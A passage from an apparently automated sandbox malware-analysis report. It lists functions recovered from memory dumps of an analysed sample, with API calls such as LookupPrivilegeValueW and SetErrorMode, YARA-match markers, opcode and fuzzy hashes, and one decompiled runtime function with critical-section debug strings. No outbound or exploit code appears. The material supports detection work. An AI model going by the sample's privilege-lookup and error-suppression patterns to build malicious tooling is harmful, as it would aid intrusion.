                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,02DCCFC2,02DCCFC2,?,00000000,?,?), ref: 02DD8A80
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: LookupPrivilegeValue
                          • String ID:
                          • API String ID: 3899507212-0
                          • Opcode ID: 53f92bad846a6b1da716cf1f8adb20bef664383476eccd7627fdd3ec78d023aa
                          • Instruction ID: 231f47c458c84a0b976678cae9d1f099c0f25700628589b02335c1ad8cfcd845
                          • Opcode Fuzzy Hash: 53f92bad846a6b1da716cf1f8adb20bef664383476eccd7627fdd3ec78d023aa
                          • Instruction Fuzzy Hash: 06E0E5751142906FCB10CB69DC44E973FA8DF45240F044599FD8857202C4309414CBB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02DD8A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                          Download Yara Rule
                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,02DCCFC2,02DCCFC2,?,00000000,?,?), ref: 02DD8A80
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: LookupPrivilegeValue
                          • String ID:
                          • API String ID: 3899507212-0
                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                          • Instruction ID: e10fcdcf72c754cbd656c534fb38eab90132f0e2ef59e10ed184ef8e324f7ae9
                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                          • Instruction Fuzzy Hash: 94E01AB12002086BDB10DF89CC84EE737ADEF88650F018154FA0857241C931E910CBF5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02DCD427, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNELBASE(00008003,?,?,02DC7C83,?), ref: 02DCD45B
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: ErrorMode
                          • String ID:
                          • API String ID: 2340568224-0
                          • Opcode ID: ea1625c1afe68924cefbdc675156c3ea6543a27b8c142bc8d2fba047ec369721
                          • Instruction ID: c51ae60e7238ae97ffba9210fee56889ce7fa8b872e2177673801049a16e15f7
                          • Opcode Fuzzy Hash: ea1625c1afe68924cefbdc675156c3ea6543a27b8c142bc8d2fba047ec369721
                          • Instruction Fuzzy Hash: F0D02B363503042BE610FBF49C02F1932896B00B64F060264FB189F3C3D910D40085A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02DCD430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNELBASE(00008003,?,?,02DC7C83,?), ref: 02DCD45B
                          Memory Dump Source
                          • Source File: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Offset: 02DC0000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: ErrorMode
                          • String ID:
                          • API String ID: 2340568224-0
                          • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                          • Instruction ID: eb824039d79eff45aa7e9fb3a79ab57c89afaedea01fa75631e40de8cf8e897f
                          • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                          • Instruction Fuzzy Hash: 92D05E717503042AE610AAA49C02F2632899B45A44F494064FA48973C3EA60E8008561
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0380967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: c07a334b6f75cd5efb891f5ad5909943385acd43cc3995a7d8a156a91af7f58e
                          • Instruction ID: 1af0dfa8aaa3e4bca2caa01c24db564de267b144821823e2931f99c0a81a84b9
                          • Opcode Fuzzy Hash: c07a334b6f75cd5efb891f5ad5909943385acd43cc3995a7d8a156a91af7f58e
                          • Instruction Fuzzy Hash: B4B09B719014D5C5D651D7E04A08B2B7D047BD0741F17C5D1D2124755B4778C095F5B5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 0385FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                          Download Yara Rule
                          C-Code - Quality: 53%
                          			E0385FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0380CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03855720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03855720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                          0x0385fdda
                          0x0385fde2
                          0x0385fde5
                          0x0385fdec
                          0x0385fdfa
                          0x0385fdff
                          0x0385fe0a
                          0x0385fe0f
                          0x0385fe17
                          0x0385fe1e
                          0x0385fe19
                          0x0385fe19
                          0x0385fe19
                          0x0385fe20
                          0x0385fe21
                          0x0385fe22
                          0x0385fe25
                          0x0385fe40

                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0385FDFA
                          Strings
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0385FE01
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0385FE2B
                          Memory Dump Source
                          • Source File: 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, Offset: 037A0000, based on PE: true
                          • Associated: 0000000C.00000002.612880139.00000000038BB000.00000040.00000001.sdmp Download File
                          • Associated: 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                          • API String ID: 885266447-3903918235
                          • Opcode ID: ba1ae0b02342f0df0d28043cac42a7e8bdc86033231451e2dc577db8896b4d06
                          • Instruction ID: 17c279f1054b2122049793526047d25980216d83d7ace9f6e2d591b164c1380b
                          • Opcode Fuzzy Hash: ba1ae0b02342f0df0d28043cac42a7e8bdc86033231451e2dc577db8896b4d06
                          • Instruction Fuzzy Hash: E2F0FC76140201BFDE205A85DC01F63BF6ADB45730F140354FA249A1D1DA62F86086F1
                          Uniqueness

                          Uniqueness Score: -1.00%